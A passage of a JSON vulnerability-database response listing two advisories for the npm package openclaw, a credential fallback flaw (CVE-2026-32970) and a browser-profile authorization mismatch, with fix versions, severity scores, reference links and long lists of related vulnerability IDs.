`openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe local-mode fallback logic decided whether remote credential fallback was allowed based on resolved credential values rather than on whether the local auth input was actually configured. A configured-but-unavailable local SecretRef therefore looked \"absent\" to the helper layer.\n\n## Fix\nOpenClaw now tracks whether the local auth input is configured separately from whether it resolves successfully. In local mode, remote fallback is allowed only when the matching local auth input is truly unset. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05701","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05715","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06774","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32970"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:45Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:45Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs"},{"reference_url":"https://github.com/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"GHSA-qvr7-g57c-mrc7","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qvr7-g57c-mrc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32970","GHSA-qvr7-g57c-mrc7"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1y7e-y41k-qyfc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91883?format=json","vulnerability_id":"VCID-21eb-723m-xkfu","summary":"OpenClaw: `browser.request` let `operator.write` persist admin-only browser profile changes\n### Summary\n\nAn authorization mismatch in the gateway let an authenticated caller with only `operator.write` use `browser.request` to reach browser profile management routes that persist configuration to disk. In practice, this exposed an admin-only configuration write primitive through `/profiles/create`.\n\n### Impact\n\nA write-scoped operator could create or modify browser profiles and store attacker-chosen remote CDP endpoints without holding `operator.admin`.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Browser profile creation now requires the correct admin boundary, and regression tests cover the write-vs-admin authorization split.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vmhq-cqm9-6p7q","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vmhq-cqm9-6p7q"},{"reference_url":"https://github.com/advisories/GHSA-vmhq-cqm9-6p7q","reference_id":"GHSA-vmhq-cqm9-6p7q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vmhq-cqm9-6p7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerab